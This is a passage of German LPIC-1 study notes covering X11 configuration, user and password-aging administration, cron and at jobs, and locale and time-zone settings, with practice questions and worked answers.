  5. Geben Sie sich den Inhalt der Variablen DISPLAY aus. Wozu dient sie? Entfernen Sie diese Variable testweise aus Ihrerer Prozessumgebung (X-Terminal) und versuchen Sie das Programm "xlogo" zu starten. Setzen Sie danach die Variable wieder neu (Inhalt wie beim Ausgangspunkt)

    echo $DISPLAY
    unset DISPLAY
    xlogo    --> Error: Can't open Display
    export DISPLAY=:0.0
    xlogo
  6. Wie heißt die Konfigurationsdatei beim alten XFree86-Grafikserver?

    /etc/X11/XF86Config
  7. Wie heißt das Kommandozeilenkonfigurationsprogramm des Xfree86-Grafikservers?

    xf86config
  8. Wie heißt das GUI-Konfigurationsprogramm des Xfree86-Grafikservers?

    XF86Setup
  9. Wozu dienen die folgenden Kommandos?

    • xvidtune → Monitor-Modlines anpassen

    • xwininfo → Informationen über ein Fenster erhalten

    • xdpyinfo → Informationen über installierten X-Server ausgeben

  10. Welche Programme spielen eine Rolle, wenn man KEINEN Display-Manager einsetzt?

    • /usr/bin/X (/usr/bin/Xorg)

    • /usr/bin/xinit (In der Praxis: xinit /usr/bin/fluxbox)

    • /usr/bin/startx (Zum Starten der Oberfläche mit Einstellungen laut ~/.xinitrc oder /etc/X11/xinit/xinitrc)

Weitere Fragestellungen

  1. Sie wollen einen Font-Server für Ihre X11-Schriftarten einrichten, welchen Eintrag müssen Sie in der

    • /etc/X11/XF86Config bzw.

    • /etc/X11/xorg.conf

    im Abschnitt Files hinzufügen?

  2. Welche Voraussetzungen müssen erfüllt sein, dass nach dem Setzen der DISPLAY-Variable auf einem X-Client die grafische Ausgabe auf dem entfernten X-Server erscheint?

  3. Welche Programme gibt es im Zusammenhang mit der serverseitigen Host-Zugriffskontrolle?

  4. Welche Datei spielt hierbei eine Rolle (Hidden File in $HOME)?

  5. Was versteht man unter dem MIT-MAGIC-COOKIE?

Praktische Übungen

  1. Sorgen Sie dafür, dass auf Debian und CentOS alle DHCP- und Network-Manager-Dienste gestoppt sind

  2. Konfigurieren Sie temporär die beiden Maschinen folgendermaßen:

    • Debian:

      • IP-Adresse: 192.168.99.1

      • Standardgateway mit folg. Zeile: route add default gw 192.168.99.254

    • CentOS:

      • IP-Adresse: 192.168.99.2

      • Standardgateway mit folg. Zeile: route add default gw 192.168.99.1

  3. Testen Sie, ob sich die beiden Maschinen gegenseitig erreichen können

  4. Legen Sie auf Debian einen Benutzer an:

    useradd -s /bin/bash -m fritz
    passwd fritz
  5. Loggen Sie sich auf die grafische Oberfläche von CentOS ein, verbinden Sie sich danach zu Debian unter Verwendung des neuen Benutzers und verschlüsseltem X11-Forwarding und testen Sie von dort aus, ob sich grafische Anwendungen wie xlogo starten lassen:

    ssh -X fritz@192.168.99.1

5. Topic 106.2: Einrichten einen Displaymanagers

  1. Wie kann man den xdm-Login-Vorgang personalisieren?

    ~/.xsession
  2. In welcher Datei konfiguriert man das GDM-Default-Greeting?

    /etc/X11/gdm/Init/Default
  3. In welcher Datei konfiguriert man ein eigenes GDM-Greeting?

    /etc/gdm/custom.conf
  4. In welcher Datei stellt man den XDM-Background ein?

    /etc/X11/xdm/Xsetup
  5. Wo kann ein Benutzer Standardeinstellungen für Fenstergröße, Fernsterort (Geometry) und Farbschema ändern?

    ~/.Xdefaults   sowie    ~/.Xresources
  6. Wie heißen die althergebrachten Standard-Wurzelverzeichnisse für die Konfiguration von xdm, gdm und kdm?

    /etc/X11/xdm
    /etc/X11/gdm
    /etc/X11/kdm
  7. Wie heißt die kdm-Konfigurationsdatei (kdm-Version für KDE4), die beim Logout abgearbeitet wird?

    /etc/kde4/kdm/Xreset
  8. Nennen Sie Kommandos und Startupdateien für ein X-Window-System ohne Displaymanager gemäß ihrer Ausführungsreihenfolge.

    startx  -> xinit  ->  ~/.xinitrc ->  X  -> openbox -> firefox
    startx  -> xinit  ->  ~/.xinitrc ->  X  -> X-Clients

6. Topic 106.3: Hilfestellung für Behinderte (Accessibility)

Wichtige Begriffe/Tools sind u.a.:

  • Sticky Keys: Unterstütung von Menschen, die Probleme haben, mehrere Tasten festzuhalten

  • emacspeak, orca: Screenreader

  • GOK: Gnome Onscreen Keyboard

7.1. Sicheres Konzept dank Unix-Erbe

Traditionell gibt es hoche Sicherheitsstandards, gemäß Herkunft gibt es harte Multiuser- und Multitaskinganforderungen, denen Linux gerecht wird.

Man unterschiedet zwischen Benutzern und einem jeweils zugeordneten Benutzeraccount, der eindeutig über die User-ID (UID) und eine oder mehrere Gruppen-IDs (GID) spezifiziert werden kann.

Diese Spezifierung geschieht in Plain-Text-Datenbankdateien unter /etc: passwd, shadow, group

Es gibt einen Benutzer mit in einer Sonderrolle: "root" = Superuser = Admin, ihm wird die UID 0 zugewiesen.

Zum etwas verwirrenden Begriff "root", der 3 mal auftaucht:

  • Benutzernanme: root

  • Heimatverzeichnis von "root": /root

  • Oberster Einhängepunkt des Dateisystems: /

Normale Benutzer werden mindestens einer Gruppe automatisch zugeordnet, einer primären Gruppe für den Login, danach können sie sich mit newgrp eine andere Gruppe zur primären machen. Das hat lediglich den Effekt, dass neue Files dann gleich diese Gruppenkennung tragen.

In sekundären Gruppen muss man z.B. auch sein, um auf bestimmte Hardwarekomponenten schreibend zugreifen zu können (kvm, audio, video, plugdev, fuse, tty).

7.2. Aufbau der Datenbankdateien

Drei Datenbankdateien sind für die Benutzerverwaltung von elementarer Bedeutung, u.U. kann eine vierte Datei existieren:

Erste Datei: /etc/passwd

  • Beispielnutzer "tux":

    • grep tux /etc/passwd → tux:x:1000:1000:tux,,,:/home/tux:/bin/bash

  • ACHTUNG: Hier könnte in Spalte 2 ein mit "crypt" verschlüsseltes Passwort stehen - was schlecht ist! - weshalb man die Datei in eine Shadow-System umwandeln sollte: Kommando: pwconv (Wieder zurückverwandeln: pwunconv)

Zweite Datei: /etc/shadow

  • Beispielnutzer "tux":

    • grep tux /etc/shadow → tux:$6$FiH…password…:16444:0:14:7:::

  • In Spalte 2 steht das verschlüsselte Passwort, wobei es sich aus drei Teilen sammensetzt:

    • Algorithmus, hier: "$6" = SHA-512 (Weitere Verfahren: "$5" = SHA-256, "$2a" = Blowfish, "$1" = MD5)

    • Salt (Zufalls-Anteil)

    • Passwortstring

  • Danach folgen 6 Spalten für die Passwort-Alterung:

    • Datum der letzten Kennwortänderung [Anzahl der Tage seit dem 01.01.1970]

    • Mindestsalter des Passwortes (Wie oft kann es geändert werden?) [Tage]

    • Maximalalter des Passwortes (Wann muss es wieder geändert werden) [Tage]

    • Passwortverfall-Warnfrist (Befor das Maximalalter erreicht ist) [Tage]

    • PW-Gültigkeit nach dem Erreichen des Maximalalters) [Tage]

    • Verfallsdatum des Accounts [Anzahl der Tage seit dem 01.01.1970]

  • Das 9. und letzte Feld ist reserviert für spätere Nutzung

Im Gesamtzusammenhang müssen dazu die Kommandos passwd, usermod und chage betrachtet werden.

Table 1. Aging im Zusammenhang mit Kommandos und deren Auswirkungen auf die sechs Spalten der /etc/shadow
passwd usermod chage

1. Letzte Kennwortänderung

[Speziell nur auf Null setzen: -e, --expire]

---

-d, --lastday

2. Mindestalter des Passwortes

-n, --mindays

---

-m, --mindays

3. Maximalalter Passwortes

-x, --maxdays

---

-M, --maxdays

4. Warnfrist Passwort-Verfall

-w, --warndays

---

-W, --warndays

5. PW-Gültigkeit nach MaxDays

-i, --inactive

-f, --inactive

-I, --inactive

6. Verfallsdatum des Accounts

---

-e, --expiredate

-E, --expiredate

Beispiele:

  • chage -W 7 -M 14 anna

    Lässt der Benutzer die Warnungen (hier: 7 Tage) unbeachtet und ist die maximale Alterung
    des Passwortes erreicht (hier: 14 Tage), kann er sich nicht mehr einloggen,
    ohne sein Passwort sofort zu ändern.
  • chage -W 7 -M 14 -I 17 anna

    Dieses Beispiel baut auf dem obigen auf; hier wird aber nach weiteren 3 Tagen
    sein Password inaktiv gesetzt und er muss den Administartor um Hilfe bitten.
  • chage -W 7 -M 14 -E 2015-03-31 anna

    Das Beispiel ist ähnlich dem ersten, hier wir aber ein absoluter Endpunkt für die
    Kontogültigkeit festgelegt (Befristeter Vertrag). Die Meldung lautet wie im zweiten
    Beispiel "Ihr Konto ist abgelaufen. Wenden Sie sich an den Systemadministrator"

Dritte Datei: /etc/group

  • Beispielnutzer "tux":

    • grep ^tux /etc/group → tux:x:1000:

      Hier wird zuerst die primäre Gruppe ausgegeben (bei Debian/CentOS bekommt
      jeder Benutzer eine gleichnamige Gruppe zugewiesen) -> der Gruppenname steht am
      Zeilenanfang
      Das "x" in Spalte 2 heißt, "schlage das Passwort in der Datei /etc/gshadow nach"
      In Spalte 3 steht die Gruppen-ID; weil diese 1000 mit dem Wert von Spalte 4
      der  /etc/passwd korreliert, handelt es sich damit um seine primäre Gruppe.
      In der Spalte 4 finden sich mit Komma getrennt die Nutzernamen, die eine oder mehrere
      Gruppen als sekundäre Gruppe zugeordnet bekommen.
    • cut -d: -f1,4 /etc/group | grep tux | sed s/tux://

Vierte Datei: /etc/gshadow

  • Sie gibt es nicht immer, sie wird gebraucht, um sich mit newgrp <GROUP> in eine neue Gruppe temorär zu bewegen, die in dem Moment zur primären Gruppe wird (Neue Dateien erhalten automatisch diese Gruppen-ID)

  • Ähnlich der /etc/shadow speichert sie Passwörter, die dann mit dem Kommando gpasswd gesetzt werden.

7.3. Kommandos zum Verwalten von Nutzern

  • useradd: mit -D werden Default-Einstellungen ausgegeben: z.B. $HOME, $SHELL, primäre Gruppe, die beim Neuanlegen von Benutzern verwendet werden soll, dabei wird die folg.Datei ausgegeben: /etc/default/useradd

  • Eine weitere Datei, die sich um Verientsellungen kümmert, ist die /etc/login.defs sie beinhaltet mehr die Account-Alterung.

Einen ersten Benutzer OHNE Heimatverzeichnis anlegen, ist er damit arbeitsfähig? -→ JA!

root@deb7:~# useradd tester
root@deb7:~# passwd tester
root@deb7:~# su - tux  <========== ÜBER EINEN ANDEREN BENUTZER GEHEN, DAMIT PASSWORTABFRAGE KOMMT
tux@deb7:~$ su - tester
Passwort:
Kein Verzeichnis, Anmeldung mit HOME=/
tester@deb7:/$
tester@deb7:/$ chsh    <====== ER KANN SEINE LOGIN-SHELL ÄNDERN (dank SUID-Bit bei /usr/bin/chsh)
Passwort:
Login-Shell für tester wird geändert.
Geben Sie einen neuen Wert an oder drücken Sie ENTER für den Standardwert
        Login-Shell [/bin/sh]: /bin/bash
tester@deb7:/$
tester@deb7:/$ exit
exit
$
$ exit
tux@deb7:~$
tux@deb7:~$ su - tester
Passwort:
Kein Verzeichnis, Anmeldung mit HOME=/
tester@deb7:/$
tester@deb7:/$ ps
  PID TTY          TIME CMD
 8068 pts/0    00:00:00 bash
 8111 pts/0    00:00:00 ps
tester@deb7:/$
tester@deb7:/$ mkdir /tmp/Briefe   <========= ER KANN IN /tmp DATEIEN ABLEGEN
tester@deb7:/$ echo Hallo Welt > /tmp/Briefe/hallo.txt
tester@deb7:/$

Anpassung der Standard-Profil-Dateien VOR dem Anlegen neue Benutzer:

root@deb7:~#
root@deb7:~# # Die Einstellungen des aktuellen (Beispiel-)Benutzers als Vorlage heranziehen:
root@deb7:~#
root@deb7:~# cp -r /home/tux/.bashrc  /home/tux/.config/  /etc/skel
cp: „/etc/skel/.bashrc“ überschreiben? j
root@deb7:~#
root@deb7:~# # VORSICHT: Es können u.U. senible Daten in den Verzichnissen des Beispiel-Benutzers
root@deb7:~# #           liegen!
root@deb7:~#
root@deb7:~#
root@deb7:~# ls -ltrc /etc/skel/
insgesamt 0
root@deb7:~#
root@deb7:~# ls -ltrca /etc/skel/
insgesamt 32
-rw-r--r--   1 root root   675 Dez 15 10:40 .profile
-rw-r--r--   1 root root   220 Dez 15 10:40 .bash_logout
drwxr-xr-x 150 root root 12288 Mär 31 12:48 ..
-rw-r--r--   1 root root  3560 Mär 31 13:16 .bashrc
drwxr-xr-x   3 root root  4096 Mär 31 13:16 .
drwxr-xr-x  18 root root  4096 Mär 31 13:16 .config
root@deb7:~#

NACHARBEIT: Heimatverzeichnis für "tester" erzeugen:

Der Benutzer "tester" muss nun sein $HOME erhalten; danach ist der Inhalt des Vorlageprofilordners /etc/skel dort hinein zu kopieren, abschließend ihm sein $HOME übereignet werden:

root@deb7:~# mkdir /home/tester
root@deb7:~#
root@deb7:~# cd /etc/skel
root@deb7:/etc/skel#
root@deb7:/etc/skel# find | cpio -pdm /home/tester
136 blocks
root@deb7:/etc/skel#
root@deb7:/etc/skel# ls -la /home/tester/
insgesamt 24
drwxr-xr-x  3 root root 4096 Mär 31 13:30 .
drwxr-xr-x  7 root root 4096 Mär 31 13:29 ..
-rw-r--r--  1 root root  220 Sep 25  2014 .bash_logout
-rw-r--r--  1 root root 3560 Mär 31 13:16 .bashrc
drwxr-xr-x 18 root root 4096 Mär 31 13:30 .config
-rw-r--r--  1 root root  675 Sep 25  2014 .profile
root@deb7:/etc/skel#
root@deb7:/etc/skel# cd
root@deb7:~#
root@deb7:~# chown -R tester:tester /home/tester/
root@deb7:~#
root@deb7:~# ls -la /home/tester/
insgesamt 24
drwxr-xr-x  3 tester tester 4096 Mär 31 13:30 .
drwxr-xr-x  7 root   root   4096 Mär 31 13:29 ..
-rw-r--r--  1 tester tester  220 Sep 25  2014 .bash_logout
-rw-r--r--  1 tester tester 3560 Mär 31 13:16 .bashrc
drwxr-xr-x 18 tester tester 4096 Mär 31 13:30 .config
-rw-r--r--  1 tester tester  675 Sep 25  2014 .profile
root@deb7:~#

Einen Nutzer unter Umgehung von Standards anlegen:

mkdir /opt/users
useradd -k /home/tux -d /opt/users/moritz -m  -s /bin/bash -g users  -c "Moritz Müller"  moritz

Dabei bedeuten die Schalter folgendes:

  • -k /home/tux Die Befüllung des neuen HOME-Orders geschieht nicht mit den Files von /etc/skel; die Quelle ist jetzt ein sauberes, angepasstes Vorlage-Userverzeichnis

  • -d /opt/users/moritz Anstelle die Voreinstellungen von /etc/default/useradd zu benutzen, soll das Heimatverzeichnis Dank der Option -m an der angegebenen Stelle entstehen

  • -m Das HOME-Verzeichnis an angegebener Stelle erzeugen, den Inhalt des Vorlage-Userverzeichnisses einkopieren und dem Nutzer übereignen

  • -s /bin/bash Als Login wird die Bash verwendet

  • -g users Dem Benutzer die primäre Gruppe "users" zuweisen

  • -c Moritz Müller Das Kommentarfeld befüllen.

7.4. Verwaltung des Shadow-Systems

Wichtige Kommandos:

  • pwconv (Konvertieren der /etc/passwd mit Passwörten zu einer Version OHNE Passwörter, wobei sie in die /etc/shadow ausgelagert werden.)

  • pwunconv (Umkehrung: wieder zu EINER Datei zurückkehren, /etc/shadow wird gelöscht)

  • pwck (Prüfen der Passwort-Dateien)

  • grpck (Prüfen der Gruppen-Dateien)

  • grpconv (Ähnlicher Vorgang wie pwconv)

  • grpunconv (Ähnlicher Vorgang wie pwunconv)

7.5. Erweiterte Rechtezuweisung mit "super user do"

Mit dem Kommando visudo kann die Datei /etc/sudoers bearbeitet werden, so dass einfache Benutzer in der Lage sind, administrative Aufgaben mit dem Vorschaltkommando sudo durchzuführen.

→ Siehe LPI-Thema 110.1

7.6. Informationen über Benutzer ausgeben

Wichtige Kommandos:

  • whoami

  • who am i

  • who (Siehe auch uptime, Logdatei: /var/run/utmp) Merkhilfe: whuuuu → uptime → /var/ruuuun -→ uuutmp

  • w

  • last (Wer hat sich zuletzt von wo eingeloggt, Logdatei: /var/log/wtmp) Merkhilfe: lllast → /var/lllog → wwwtmp (w kommt nach u = last) Last kennt eine Option -o: → "Read an old-type wtmp file"

  • lastb (Bad logings loggen, Log-Datei: /var/log/btmp) Merkhilfe: lllast → /var/lllog → bbbtmp = bad temp

7.7. Fragen zur Wiederholung

  1. Legen Sie zwei Benutzer user01 und user02' mitsamt Heimatverzeichnis an.

    useradd -m user01
    useradd -m user02
  2. Erzeugen Sie zwei Gruppen group01 und group02.

    groupadd group01
    groupadd group02
  3. Modifizieren Sie die beiden Benutzer, indem Sie user01 als primäre Gruppe group01 und user02 die Gruppe group02 zuweisen.

    usermod -g group01 user01
    usermod -g group02 user02
  4. Modifizieren Sie die beiden Benutzer, indem Sie den beiden Benutzern als sekundäre Gruppen audio, video und dialout zuweisen.

    usermod -G audio,video,dialout user01
    usermod -G audio,video,dialout user02
  5. Legen Sie eine Gruppe sharing an und fügen Sie die beiden Benutzer dieser Gruppe ZUSÄTZLICH (sekundäre Gruppenzugehörigkeit) hinzu.

    groupadd sharing
    usermod -aG sharing user01
    usermod -aG sharing user02
  6. Lassen Sie sich alle relevanten Einträge der Benutzerdatenbankdateien ausgeben.

    cd /etc
    grep 'user0[1,2]' passwd shadow group gshadow
  7. Lassen Sie sich die Benutzer-ID und die Gruppenmitgliedschaften der Benutzer ausgeben.

    id user01
    id user02
  8. Loggen Sie sich als Benutzer user01 ein, bringen Sie in Erfahrung, wer außer Ihnen noch eingeloggt ist, um ihn mit "write" eine Nachricht zu senden.

    su - user01
    who  (alternativ: w)
    write tux  (alternativ sendet 'wall' Nachrichten an alle eingeloggten Benutzer)
  9. Löschen Sie den Benutzer user01, wobei sein Heimatverzeichnis erhalten bleiben soll.

    userdel user01
  10. Löschen Sie den Benutzer user02, wobei sein Heimatverzeichnis NICHT erhalten bleiben soll.

    userdel -r user02

HINWEIS: Neben den modifizierenden Werkzeugen kann auch vipw eingesetzt werden, mit -g wird die /etc/group und mit -s die /etc/shadow bearbeitet.

Weitere Praxisaufgaben

Zielstellung: Zwei Techniker (Benutzer herbert und hubert) sollen im gemeinsamen Heimatverzeichnis /srv/technik Dokumente anlegen, die Dateien des jeweils anderen lesen, aber nur die eigenen bearbeiten können. Halten Sie dabei am besten die folgenden Arbeitsschritte ein:

  1. Gruppe technik anlegen

    • Gruppe erzeugen: groupadd technik

  2. Heimatverzeichnis erzeugen, Rechte anpassen (Stick-Bit verwenden!)

    • Ordner anlegen: mkdir /srv/technik

    • Gruppe ändern: chgrp technik /srv/technik

    • Rechte ändern: chmod 1070 /srv/technik

      ### Falls man besser KEIN gemeinsames Heimatverzeichnis verwenden möchte, kann der
      eben angelegte Order als Austausch-Container benutzt werden, zur einfacheren Handhabung
      einen Sym-Link erzeugen:
                                      ln -s /srv/technik ~/Austausch
  3. Anlegen der beiden Benutzer unter Zuweisung von technik als PRIMÄRE GRUPPE, des gemeinsamen Heimatverzeichnisses und der bash; Vergabe von Passwörten

    • User 1 anlegen: useradd -g technik -d /srv/technik -s /bin/bash herbert

    • User 2 anlegen: useradd -g technik -d /srv/technik -s /bin/bash hubert

    • Passwort 1 setzen: passwd herbert

    • Passwort 2 setzen: passwd hubert

  4. Testen der Zugriffsrechte (Benutzer wechseln, Dokument erzeugen)

    • Als Benutzer 1 einloggen: su - herbert

    • Dokument erstellen: echo 123 > projekt1.txt

    • Als Benutzer 2 einloggen: su - hubert

    • Dokument erstellen: echo 123 > projekt2.txt

    • Versuchen, das Dokument von Benutzer 1 zu verändern: echo Anmerkung >> projekt1.txt

  5. Ein gemeinsam zu bearbeitendes Dokument gemeinsame-notizen.txt erzeugen, vorher mit umask für Schreibrechte für Gruppenmitglieder sorgen:

    • Negativmaske setzen: umask 002

    • Dokument erzeugen: echo Huberts Ideen: … > gemeinsame-notizen.txt

    • Kontrolle: ls -l -→ -rw-rw-r-- 1 hubert technik … gemeinsame-notizen.txt (DIE GRUPPE HAT SCHREIBRECHT BEKOMMEN)

    • Bitte testen; Hubert darf Daten anhängen: echo Anmerkung >> gemeinsame-notizen.txt

  6. Mit Hilfe set verhindern, dass sich die Beiden gegeseitig Dateien mit > überschreiben können:

    • Nicht "verprügeln": set -o noclobber

8. Topic 107.2: Automate system administration tasks by scheduling jobs

Zwei Zeitsteuerungsmethoden

  • Ständig wiederkehrende Aufgaben: cron / anacron

  • Einmalig auszuführende Jobs: at / batch

8.1. Wiederkehrende Aufgaben mit cron

  • Der cron-Daemon läuft i.d.R. immer, er überwacht /var/spool/cron/crontabs

  • Die systemweite Config-Datei /etc/crontab bindet weitere Verzeichnisse ein, in denen Skripte mit Zietsteuerungen liegen können, z.B.

    • /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly

  • Im Unterschied zu User-Crontabs hat die /etc/crontab eine Spalte mehr: Username

  • Als Standard-Shell wird die einfache /bin/sh verwendet, als Newline-Zeichen ist (%) eingestellt!

  • Zur Bedeutung der einzelnen Felder siehe man 5 crontab

Beispiele

  • Systembackup als root einrichten

    mkdir /srv/backup
    vi /etc/crontab
        (Nach dem Speichern und Beenden wird die Änderung von cron automatisch eingelesen)
# Täglich um 2 Uhr das Verzeichnis /etc sichern
0 2 * * * root    tar czf  /srv/backup/etc-`date +\%F`.tar.gz  /etc 2> /dev/null

# Wochentags 2x täglich um 14 und 2 Uhr Backup von /home machen
0 2,14 * * 1-5  root  tar czf /srv/backup/home-`date +\%F_\%H`.tar.gz  /home 2> /dev/null
  • Eigene Backups als user planen

    • Kommando crontab

    • Optionen

      • -l Jobs auflisten

      • -e Jobs editieren

      • -r Gesamte Crontab löschen

      • -u <USER> … Als root Crontabs anderer User einsehen/bearbeiten/…

        crontab -e
                (Bei Debian startet sich nano:
                        Speichern: STRG + O
                        Beenden: STRG + X
        alternativ Variable setzen:  'export EDITOR=vi')
# Montags, Mittwochs und Freitags aller 10 Minuten eine Datei unter /tmp mit Zeitstempel anlegen
# min h dom mon dow command
*/10 * * * 1,3,5  date > /tmp/datei-`date +\%F_\%H:\%M`

8.2. Aufgaben zur Wiederholung

  1. Erstellen Sie als "hubert" einen Cronjob, der aller 10 Minuten das Verzeichnis ~/Dokumente sichert, wobei ein Zeitstempel mitgegeben werden soll. Welche zwei Möglichkeiten gibt es, die Zeitplanung zu realisieren?

    • Zielordner erzeugen: mkdir ~/BACKUP

    • Als Benutzer: crontab -e

      0,10,20,30,40,50  * * * *  tar czf ~/BACKUP/Dokumente-$(date +\%F_\%M:\%H).tar.gz  ~/Dokumente
      */10 * * * *  tar czf ~/BACKUP/Dokumente-$(date +\%F_\%M:\%H).tar.gz  ~/Dokumente
  2. Entfernen Sie nach Abschluss der Cronjob-Tests als root die Cron-Tabelle von hubert.

    • Sicher root werden: /bin/su -

    • Crontab komplett löschen: crontab -r -u hubert

  3. Erklären Sie Gemeinsamkeiten und Unterschiede von cron und anacron.

    • Gemeinsamkeit: Planung von sich ständig wiederholenden Aufgaben

    • Unterschiede:

      • Anacron führt die Aufgaben nur 1x täglich durch, ist für Desktop-Rechner -→ jobs werden nachgeholt, wenn der Rechner nicht zur geplanten Zeit läuft

      • Cron = für Server gedacht, die Rund um die Uhr laufen, weshalb periodische Abarbeitung möglich ist

  4. Schreiben Sie ein Skript, das den Download eines Radio-Stroms mit

wget http://dradio_mp3_dlf_m.akacast.akamaistream.net/7/249/142684/v1/gnl.akacast.akamaistream.net/dradio_mp3_dlf_m

auslöst und denselben nach 3 Minuten wieder stoppt. Eine mögliche Lösung könnte lauten:

#!/bin/sh
#
# dradio-mitschnitt.sh

wget http://dradio_mp3_dlf_m.akacast.akamaistream.net/7/249/142684/v1/gnl.akacast.akamaistream.net/dradio_mp3_dlf_m &

sleep 3m

killall wget

9. Topic 107.3: Localisation and internationalisation

9.1. Zeitzoneneinstellungen

  • Änderungen mit Hilfe eines Skriptes: tzselect

    • ZIEL: Verändungen der Nutzer-Umgebungsvariablen (ohne root-Berechtigung) "TZ":

      tzselect
      10) Pacific Ocean -> 29) Hawaii  -> 1) YES
      Hilfstext: TZ='Pacific/Honolulu'; export TZ
      echo "export TZ='Pacific/Honolulu'" >> .profile
      source .profile
    • Ein veraltetes Kommando ist diesbezüglich: tzconfig

  • Ausgangspunkt für Zeitzonen: /usr/share/zoneinfo

    • Oberste Verzeichnisebene: Kontinent

    • Unterste Ebene = Zielobjekt (Link oder Binärdatei): Stadt

  • Änderungen mit Hilfe von SymLinks oder direktem Kopieren der Binärdateien (als root!):

    • Datei für das Speichern des Stadtnamens: /etc/localtime

      • Unter CentOS: ln -s /usr/share/zoneinfo/Europe/Berlin /etc/localtime

      • Unter Debian: cp /usr/share/zoneinfo/Europe/Berlin /etc/localtime

    • Eine weitere, möglicherweise nicht vorhandene Datei (Klartext): /etc/timezone (Datei hat nur informellen Wert)

      Inhalt bei Debian:   Europe/Berlin
      (Bei Debian macht es Sinn, dass die Datei existiert, da anders als bei
      RedHat - wo es sich um einen SymLink handelt, an den man die Zeitzone
      ablesen kann - die '/etc/localtime' hier eine binäre Datei ist, anhand
      der die Zone nicht direkt ersichtlich ist.)

9.2. Umgebungsvariablen für Lokalisierung

ZIEL: Landeskonforme Darstellung von Einheiten wie Währung, Parpierformat, Datum, Uhrzeit…

  • Ausgabe der Standardeinstellungen (Nutzerabhängig!): locale

  • Ausgabe der verfügbaren Lokalisierungen: locale -a

  • Spezielle Variablen:

    • LANG: Standartwert für alle Variablen vorgeben, der leicht von der einzelnen benutzerdefinierten Variable überschrieben werden kann, z.B.:

      export LANG=C    (Rohdaten-Ausgabe [engl])
      export LC_PAPER="de_DE.UTF-8"
      Dieses Variablen können für einmaige Ausführung vorangestellt werden:
      LANG=C date
    • LANG: Nur die Sprache ändern, andere Variablen behalten ihren Wert, Initialisierung aus der /etc/inittab heraus. Sie besitzt hohe Priorität: LC_ALL kann sie nicht mit ändern.

    • LC_ALL: Alle LC_-Variablen mit einem Mal setzen (außer "LANG") Die benutzerdefinierten Variablen (z.B. "LC_PAPER") lassen sich hier nachträglich NICHT personalisieren.

  • Hinweis: Das althergebrachte Suchen nach Grußbuchstaben in Dokumenten mit funktionert mit LANG="de_DE.UTF-8" nicht mehr, da grep mit UTF-8 u.U. nicht klarkommt, Lösung:

    LANG=POSIX grep '^[A-Z].*' textdokument.txt
  • Nachträgliche Konvertierung von Zeichensätzen in Textdokumenten: iconv, z.B:

    echo "Viel Spaß und viel Glück." > sourcefile.txt
    file sourcefile.txt    -> sourcefile.txt: UTF-8 Unicode text
    iconv -f UTF-8 -t ISO-8859-15 sourcefile.txt -o outputfile.txt
    file outputfile.txt    -> outputfile.txt: ISO-8859 text
    cat outputfile.txt     -> Viel Spa� und viel Gl�ck.
    TIPP: Ausgabe der bekannten Zeichencodes: 'iconv -l'
  • Konvertieren von Zeichensätzen in Dateinamen: convmv

    Siehe auch http://www.heise.de/ct/hotline/Linux-vermatscht-Umlaute-326142.html
    Ursache kann falsches Mounten von vfat-Partitionen sein; am besten man beugt vor:
    mount -o iocharset=utf8 /dev/sdb1  /mnt

9.3. Netzwerkkonfiguration CentOS

AUFGABE:

  • Zweiten Adapter in VirtualBox aktivieren, mit "Internes Netzwerk" verbinden, dabei den Namen "intnet2" vergeben.

  • Hinweise zur Konfiguration der Ethernet-Karten: Bei CentOS 7 heißen die Schnittstellen, die man mit ifconfig -a identifizieren kann nicht eth0 und eth1, sondern enp0s3 und enp0s8. Die Dateinamen wurden im Beispiel mit ifcfg-nic0 und ifcfg-nic0 bewusst abweichend gewählt; entscheidend ist lediglich, dass eine Übereintimmung der identifizierten Schnittstellennamen mit der Angabe bei DEVICE="" besteht.

Die Konfiguration erfolgt natürlich wieder als root:

# Ins verantwortliche Verzeichnis wechseln
cd /etc/sysconfig/network-scripts/
# Die erste Schnittstelle konfigurieren/anpassen, es reichen 5 Zeilen aus:
vi ifcfg-nic0
BOOTPROTO="none"
ONBOOT="yes"
IPADDR="172.16.0.2"
PREFIX="30"
DEVICE="enp0s3"
# Die zweite Schnittstelle konfigurieren/anpassen, es reichen 5 Zeilen aus:
vi ifcfg-nic1
BOOTPROTO="none"
ONBOOT="yes"
IPADDR="192.168.99.1"
PREFIX="24"
DEVICE="enp0s8"

Abschließend das Netzwerk stoppen und wieder starten:

/etc/init.d/network stop
/etc/init.d/network stop

Zur Kontrolle eingeben:

ifconfig
ping -c3 172.16.0.1

9.4. Übungen/Fragen zur Wiederholung

  1. Erstellen Sie eine einmalig auszuführende Aufgabe, die am morgigen Tag zur Tee- bzw. Kaffeezeit die aktuelle Uhrzeit zusammen mit der Nachricht "Jetzt ist Vesper." ins Systemlog schreibt.

    at teatime tomorrow
    at> logger "Jetzt ist Vesper: `date +%F`"
    STRG + D
  2. Lassen Sie sich die einmalig laufenden, auf Ausführung wartenden Aufgaben auflisten, löschen Sie den letzten Job.

    atq
    at -c 6    (Detaillierte Auskunft über der Job 6 erhalten)
    atrm 6      (Alternativ: at -r)
  3. Wie heißen wichtige Variablen für die Lokalisierungseinstellungen eines Benutzers? Mit welchen Kommandos kann man sie ausgeben?

    Das Kommando "locale" gibt eine Übersicht aus, beseispielsweise:
    • LANG

    • LC_PAPER

    • LC_TIME (Zeit- und Datumsformat, NICHT die Zeitzone!! → TZ)

    • LC_TELEPHONE

    • LC_ALL (Nicht überschreibbar!)

  4. Welche Variable kann mehrere Lokalisierungvariablen mit Default-Werten ausstatten, wobei sie aber mit eigenen Werten überschrieben werden können?

    Die Variable "LANG"
  5. Geben Sie mit Hilfe von date temporär in einer Kommandozeile die aktuelle Uhrzeit von Bulgarien aus.

    Zeitzonenkonfigurationsfrontend:  tzselect
    TZ=Europe/Sofia date
  6. In welcher Verzeichnisstruktur befinden sich die Binärformat-Zeitzonendateien?

    /usr/share/zoneinfo     --> Kontinent/Stadt
  7. Wie heißt die Datei, die die Zeitzone Ihres Rechners ausgehend von den Binärformat-Zeitzonendateien konfiguriert?

    /etc/localtime          (Die Ortszeit (Stadt), die am Rechnerstandort gilt...)
  8. Wie heißt die Datei (falls vorhanden), mittels der Sie in Erfahrung bringen können, in welcher Zeitzone Sie sich aktuell befinden?

    /etc/timezone           (Zur Kontrolle, Klartextdatei)
  9. Laden Sie sich unter Debian als root die englische Tastaturbelegung. Testen Sie es und setzen Sie die Einstellung abschließend zurück (Siehe https://wiki.debian.org/Keyboard).

    dpkg-reconfigure console-data
    dpkg-reconfigure keyboard-configuration
    service keyboard-setup restart
